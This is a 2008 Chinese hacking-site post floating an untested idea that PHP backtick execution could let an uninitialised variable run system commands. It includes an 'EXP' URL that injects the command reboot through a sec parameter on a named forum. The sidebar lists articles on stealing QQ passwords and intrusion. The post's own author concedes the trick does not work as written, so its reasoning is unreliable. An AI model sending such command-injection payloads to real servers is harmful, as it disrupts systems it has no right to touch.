网络天下|黑客安全|-黑客中国|免费BLOG|黑客安全|安全检测|视频教学|最新音乐|免费游戏|免费软件|安全技术|技术探讨|安全教程

所属分类: 网络收集 更新日期:2008-4-29 17:55:48 阅读次数:104

PHP漏洞挖掘的一点思路



<?php
$now1 = `date`;
echo "Now date is: $now1";
?>

/*
利用PHP的反引号` (不明白的自己查资料反引号"`"的作用)
如果 $sec 变量未赋初值,可能导致 shell_exec 执行系统指令
*/

<?php
echo "$sec"; // 同理这个也可能. echo $sec;
?>

EXP:
http://forum.eviloctal.com/exp.php?sec=`reboot`
这样只会把 $sec 当作变量来处理, 需要适当的变通一下。。。

今天翻书时无意间发现的,还没测试,有兴趣的朋友可以研究下。

PS:
变量在内存中初始化,一直保存在内存中。 未unset, 就可以读取!







文章分类

网络收集
支持原创
系统后门

本类热门文章

  google入侵语法整理(253478)
免费Q币,取得相对比较容易(50442)
随便修改别人的QQ号密码(42289)
网上十大黑客软件大曝光(33576)
成为顶级黑客(2003年...(32528)
免费拨打长途固定电话(25246)
QQ密码忘了?打造自己的...(22814)
最详细的黑客教程--第一部(22486)
黑客之八种超级武器(上)(18198)
如何让自己成为一名黑客高...(16509)
网吧常见漏洞及利用(16496)
经典攻击入侵手段(16475)
一分钟入侵WIN9X(14363)
唯一的免费ASP空间(11296)
WEB入侵的过程(9036)

文章搜索



本 站 声 明

  本站的大部分资料,文章都来自网上收集,其版权归作者本人所有,如果有任何侵犯您权益的地方,请联系我,我将马上进行整理,谢谢。

网络天下 版权所有
豫ICP备05013117号 41653354-8
Email: webmaster@lzbiz.com QQ:7787686 TEL:13783172430